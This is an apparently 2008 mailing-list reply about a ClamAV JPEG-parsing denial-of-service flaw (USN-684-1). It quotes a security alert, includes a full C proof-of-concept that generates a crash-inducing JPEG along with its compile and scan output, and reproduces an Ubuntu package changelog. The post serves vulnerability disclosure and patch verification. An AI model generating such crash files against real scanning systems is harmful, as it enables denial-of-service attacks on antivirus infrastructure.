Re: [USN-684-1] ClamAV vulnerability
test@ubuntu:~$ clamscan -V
ClamAV 0.94.1/8713/Tue Dec 2 14:59:31 2008
>From http://securitytracker.com/alerts/2008/Dec/1021296.html:
Version(s): prior to 0.94.2
Description: A vulnerability was reported in Clam AntiVirus. A remote user can
cause denial of service conditions on the target system.
A remote user can create a specially crafted JPEG file that, when processed by
the target system, will trigger a stack overflow and cause the Clam AntiVirus
process to crash.
Ilja van Sprundel reported this vulnerability.
Impact: A remote user can create a JPEG file that, when processed by the target
application, will cause the target application to crash.
Solution: The vendor has issued a fixed version (0.94.2).
The vendor's advisory is available at:
http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134
Also reference @ https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266
test@ubuntu:~$ cat > clam.c
const char crashstr[] = "\xff\xd8" // jpg marker
"\xff\xed" // exif data
"\x00\x02" // length
"Photoshop 3.0\x00"
"8BIM"
"\x04\x0c" // thumbnail id
"\x00"
"\x01"
"\x01\x01\x01\x01"
"0123456789012345678912345678"; // skip over 28 bytes
#include
#include
#include
#define NR_ITER 200000
int main() {
FILE *fp;
int i;
fp = fopen("clamav-jpeg-crash.jpg", "w+");
if (!fp) {
printf("can't open/create file\n");
exit(0);
}
for (i = 0; i < NR_ITER; i++) {
fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
fp);
}
fclose(fp);
printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
exit(0);
}
test@ubuntu:~$ gcc -o clam clam.c
test@ubuntu:~$ ./clam
done, now run clamscan on ./clamav-jpeg-crash.jpg
test@ubuntu:~$ which clamscan
/usr/bin/clamscan
test@ubuntu:~$ /usr/bin/clamscan ./clamav-jpeg-crash.jpg
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./clamav-jpeg-crash.jpg: OK
----------- SCAN SUMMARY -----------
Known viruses: 469917
Engine version: 0.94.1
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 11.44 MB
Time: 2.238 sec (0 m 2 s)
test@ubuntu:~$
As of 12.02.2008:
clamav (0.94.dfsg.1-1ubuntu0.1) intrepid-security; urgency=low
* SECURITY UPDATE: (LP: #296704)
- Fix off-by-one heap overflow
* Other changes:
- debian/control: Recommends apparmor >= 2.1+1075-0ubuntu6 for
clamav-daemon and clamav-freshclam
- add debian/usr.bin.freshclam and debian/usr.sbin.clamd
- debian/clamav-(daemon|freshclam).dirs: add etc/apparmor.d/force-complain
- debian/clamav-(daemon|freshclam).install: install profiles
- debian/clamav-(daemon|freshclam).preinst: create symlink for
force-complain/ on pre-feisty upgrades, upgrades where apparmor-profiles
profile is unchanged (ie non-enforcing) and upgrades where the profile
doesn't exist.
- debian/clamav-(daemon|freshclam).postrm: remove symlink in
force-complain/ on purge.
- debian/clamav-(daemon|freshclam).postinst.in: reload apparmor
- update README.Debian with note on Apparmor
* Update apparmor profile for clamd to work with TCP sockets (LP: #288942)
-- Scott Kitterman Wed, 12 Nov 2008 15:20:49 -0500